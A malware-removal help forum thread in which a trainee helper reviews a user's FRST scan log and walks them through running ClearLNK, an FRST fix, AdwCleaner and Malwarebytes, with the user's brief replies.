2017-04-12 14:19 - 2016-06-30 18:39 - 00000000 ____D C:\Users\hilton\AppData\Roaming\Stardock
2017-04-12 14:19 - 2016-06-29 17:49 - 00000000 ____D C:\Users\hilton\AppData\Roaming\Adobe
2017-04-12 14:19 - 2016-06-29 16:31 - 00000000 ____D C:\Users\hilton\AppData\Local\VirtualStore
2017-04-12 14:18 - 2016-12-30 13:38 - 00000000 ____D C:\Users\hilton\AppData\Local\Mozilla
2017-04-12 14:16 - 2016-12-25 17:07 - 00000000 ____D C:\Users\hilton\AppData\Local\Google
2017-04-12 14:16 - 2016-12-25 17:06 - 00000000 ____D C:\Users\hilton\AppData\Local\Apps\2.0
2017-04-12 14:16 - 2016-08-21 14:27 - 00000000 ____D C:\Users\hilton\AppData\Local\Microsoft Games
2017-04-12 14:15 - 2016-08-01 21:31 - 00000000 ____D C:\ProgramData\Package Cache
2017-04-12 14:15 - 2016-06-30 18:39 - 00000000 ____D C:\ProgramData\Stardock
2017-04-12 14:14 - 2017-02-27 15:03 - 00000000 ____D C:\Program Files\WIDCOMM
2017-04-12 14:14 - 2016-12-18 22:19 - 00000000 ____D C:\ProgramData\AVAST Software
2017-04-12 14:14 - 2016-09-26 12:37 - 00000000 ____D C:\Program Files\Synaptics
2017-04-12 14:14 - 2016-07-13 12:28 - 00000000 ____D C:\ProgramData\Adobe
2017-04-12 14:14 - 2016-07-05 14:18 - 00000000 ___HD C:\ProgramData\CanonBJ
2017-04-12 14:14 - 2016-07-02 15:54 - 00000000 ____D C:\ProgramData\Driver Support
2017-04-12 14:14 - 2016-06-30 18:39 - 00000000 ____D C:\Program Files\Stardock
2017-04-12 14:14 - 2016-06-29 18:32 - 00000000 ____D C:\Program Files\Siber Systems
2017-04-12 14:14 - 2009-07-13 22:37 - 00000000 ____D C:\Program Files\Windows NT
2017-04-12 14:13 - 2016-08-31 14:14 - 00000000 ____D C:\Program Files\SAMSUNG
2017-04-12 14:13 - 2016-07-04 15:01 - 00000000 ____D C:\Program Files\OpenOffice 4
2017-04-12 14:13 - 2016-07-02 15:09 - 00000000 ____D C:\Program Files\PCPitstop
2017-04-12 14:13 - 2009-07-14 00:52 - 00000000 ____D C:\Program Files\MSBuild
2017-04-12 14:12 - 2017-01-28 15:19 - 00000000 ____D C:\Program Files\Canon
2017-04-12 14:12 - 2017-01-28 15:13 - 00000000 ___HD C:\Program Files\CanonBJ
2017-04-12 14:12 - 2016-12-25 17:07 - 00000000 ____D C:\Program Files\Google
2017-04-12 14:12 - 2016-12-18 22:21 - 00000000 ____D C:\Program Files\Common Files\AV
2017-04-12 14:12 - 2016-12-18 22:19 - 00000000 ____D C:\Program Files\AVAST Software
2017-04-12 14:12 - 2016-07-13 12:28 - 00000000 ____D C:\Program Files\Common Files\Adobe
2017-04-12 14:12 - 2012-07-23 19:53 - 00000000 ___HD C:\Program Files\InstallShield Installation Information
2017-04-12 14:10 - 2016-07-13 12:28 - 00000000 ____D C:\Program Files\Adobe
2017-04-12 14:10 - 2012-07-23 19:53 - 00000000 ____D C:\Program Files\Analog Devices
2017-04-12 14:02 - 2016-07-27 13:52 - 00000543 _____ C:\Users\hilton\Desktop\Calendar -.website
2017-04-12 13:49 - 2016-08-03 15:21 - 00000494 _____ C:\Users\hilton\Desktop\FLSurvey.website
2017-04-11 16:08 - 2016-07-11 16:19 - 00000479 _____ C:\Users\hilton\Desktop\BING.website
2017-04-11 15:55 - 2016-12-30 15:20 - 00003736 _____ C:\Users\hilton\Desktop\AmazonSmil.website
2017-04-10 16:59 - 2016-11-21 15:54 - 00000582 _____ C:\Users\hilton\Desktop\where is my phone android - Google Search.website
2017-04-09 11:49 - 2016-06-29 19:04 - 00000466 _____ C:\Users\hilton\Desktop\Discover.website
2017-04-08 15:56 - 2016-07-05 15:28 - 00000616 _____ C:\Users\hilton\Desktop\Time Warner Cable.website
2017-04-08 11:53 - 2016-07-05 13:57 - 00000422 _____ C:\Users\hilton\Desktop\AAA.website
2017-04-06 15:16 - 2016-07-10 13:21 - 00000494 _____ C:\Users\hilton\Desktop\Speedtest.net (1).website
2017-04-06 13:41 - 2016-07-03 13:44 - 00000476 _____ C:\Users\hilton\Desktop\YouTube.website
2017-04-05 10:15 - 2016-07-05 15:59 - 00000429 _____ C:\Users\hilton\Desktop\CoaguChek Link.website
2017-04-02 12:21 - 2016-08-02 12:37 - 00000451 _____ C:\Users\hilton\Desktop\Yahoo.website
2017-04-02 12:09 - 2016-07-01 13:17 - 00000413 _____ C:\Users\hilton\Desktop\humanaDRU.website
2017-03-31 14:45 - 2017-01-30 14:46 - 00000488 _____ C:\Users\hilton\Desktop\Home Delivery Supplies.website
2017-03-31 14:20 - 2016-07-03 16:25 - 00000501 _____ C:\Users\hilton\Desktop\Komando.com.website
2017-03-27 13:27 - 2017-03-09 15:08 - 00000563 _____ C:\Users\hilton\Desktop\USASACUP and 9thASA - A club for 9th ASA and USASACUP war stories - Yahoo Groups.website
2017-03-27 10:29 - 2016-08-31 11:56 - 00000507 _____ C:\Users\hilton\Desktop\Pharmacy.website
2017-03-26 15:37 - 2016-11-19 17:24 - 00000501 _____ C:\Users\hilton\Desktop\TiVoCommunity Forum.website
2017-03-26 13:18 - 2016-07-05 15:30 - 00000493 _____ C:\Users\hilton\Desktop\eBay.website
2017-03-20 03:56 - 2016-06-27 18:58 - 00181232 _____ C:\Windows\Minidump\032017-34242-01.dmp
2017-03-19 15:15 - 2017-03-12 14:18 - 00000000 ____D C:\Users\hilton\AppData\Roaming\Kodi
2017-03-19 13:44 - 2016-06-30 16:50 - 00000486 _____ C:\Users\hilton\Desktop\DUKE.website
2017-03-19 10:49 - 2016-07-02 15:47 - 00000972 _____ C:\Users\Public\Desktop\CCleaner.lnk
2017-03-19 10:49 - 2016-07-02 15:47 - 00000972 _____ C:\ProgramData\Desktop\CCleaner.lnk
2017-03-19 10:45 - 2016-08-16 11:51 - 00000000 ____D C:\Users\hilton\AppData\Local\CrashDumps
2017-03-19 01:00 - 2016-07-03 13:23 - 00000000 ____D C:\Users\hilton\AppData\Local\ElevatedDiagnostics
2017-03-15 03:22 - 2009-07-14 00:52 - 00000000 ____D C:\Program Files\DVD Maker
2017-03-14 16:29 - 2016-08-02 13:58 - 00000522 _____ C:\Users\hilton\Desktop\googole.website

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2017-04-13 00:19

Hello Hefs, just so you know I am training here in malware removal and before I can present any fix to you they will have to be checked by my teacher. That should not be such a bad thing because two pairs of eyes may be better than one, even though it may be a little slower than usual. Hope you are OK with this and I hope you stay with us until we give you the all clear.

I see you have already used some tools, and when we finish I will help you remove them all. Don’t be concerned about the stuff Malwarebytes found and quarantined, it’s safe there and will be dealt with.

Also where possible please download and run any tools from your desktop as previously requested. Whilst I check your log files can you please follow the instructions below and we will clean up your shortcuts.

As you ran FRST from your downloads folder the Shortcut.txt file will be there. Can you please move it to your desktop?

Download ClearLNK save it to your desktop.
Drag the file Shortcut.txt made with FRST earlier.
As per picture.
A report on the work as a file ClearLNK- .log
Will be produced, post that log please

https://pchelpforum.net/proxy.php?image=https%3A%2F%2Fup2sha.re%2Fuploads% 2F2015%2F3%2FBPD7B3BAgEQl.gif&hash=f65630ba2178027 f4643224f28999e44

ok..no problem..no hurry..thanks for the help..

ooops..let me do it right this time …sorry..

Hope this is right..
By way…almost all my short cuts disappeared when I ran this ??? Will they come cack ???

Hello Hefs, will return tomorrow

Hello Hefs, We will return to your shortcuts after we have cleaned your machine. In the meantime you can recreate any necessary ones.

FRST fix.
[ul]
[li]Please download the attached Fixlist.txt file to your desktop.[/li][li]It is important that both the Fixlist file and FRST are in the same location or the fix will not work.[/li][li]Run FRST and click the button marked fix once.[/li][li]FRST will take a while to run the fix and at the completion will reboot your PC, please allow this.[/li][li]When your computer restarts FRST will generate a log file on your desktop called Fixlog.txt[/li][li]Can you please Copy and paste the contents of that file in your next reply.[/li][li]PLEASE NOTE: this script was specifically written for use on this particular machine. Running this fix on another machine may permanently damage the operating system.[/li][/ul]

Adware Cleaner Scan.

Please download AdwCleaner by Malwarebytes onto your desktop.
[ul]
[li]Close all open programs and internet browsers.[/li][li]Double click on adwcleaner.exe to run the tool.[/li][li]Click on Scan button.[/li][li]When the scan has finished click on Clean button.[/li][li]Your computer will be rebooted automatically. A text file will open after the restart.[/li][li]Please post the contents of that logfile with your next reply.[/li][li]You can find the logfile at C:\AdwCleaner[S1].txt as well.[/li][/ul]

Malwarebytes.
[ul]
[li]Download MalwareBytes Anti-Malware : https://www.malwarebytes.com/mwb-download/ take the free version ( on the left )[/li][li]Perform the installation[/li][li]Uncheck “Enable Free Trial of Malwarebytes Anti-Malware Premium” if it’s asked[/li][li]Malwarebytes will update, let this update,[/li][li]Click on the “Settings” tab and then on the “Detection and Protection” tab, Check the box “Search for Rootkits”[/li][li]Click on the “Analysis” tab and then on “Start analysis”[/li][li]Once the review is complete, check that all detections are checked and then click [Delete Selection][/li][li]If Malwarebytes asks you to restart your PC, click “Yes”[/li][li]When restarting your PC, restarts Malwarebytes[/li][li]Opens the “History” tab and then “Application logs”[/li][li]Double click on the last Scan Log in date (the one above)[/li][li]At the bottom click [Export] → select “Text file (* .txt)”[/li][li]In the explorer selects the desktop, name it mbam.txt, click [Save][/li][/ul]

Your next reply should contain the contents of
[ol]
[li]Fixlog.txt[/li]
[li]AdwCleaner[xx].txt[/li]
[li]mbam.txt[/li][/ol]
Should you have any questions or difficulty with these instructions, please ask

[COLOR=rgb(255, 0, 0)][COLOR=rgb(255, 0, 0)][COLOR=rgb(255, 0, 0)][COLOR=rgb(255, 0, 0)][COLOR=rgb(0, 0, 255)][COLOR=rgb(255, 0, 0)][COLOR=rgb(255, 0, 0)][COLOR=rgb(255, 0, 0)]

---

ok..thanks for the info..will be home all day tomorrow and will work on this..
Thanks,
hefs[/color][/color][/color][/color][/color][/color][/color][/color]

---

ok..downloaded both fixit.txt and frst to computer..they went into desktop download folder… put them over on desktop…ran scan on frst and when it finished I ran FIX..that was an hour ago and it is still running…normal ???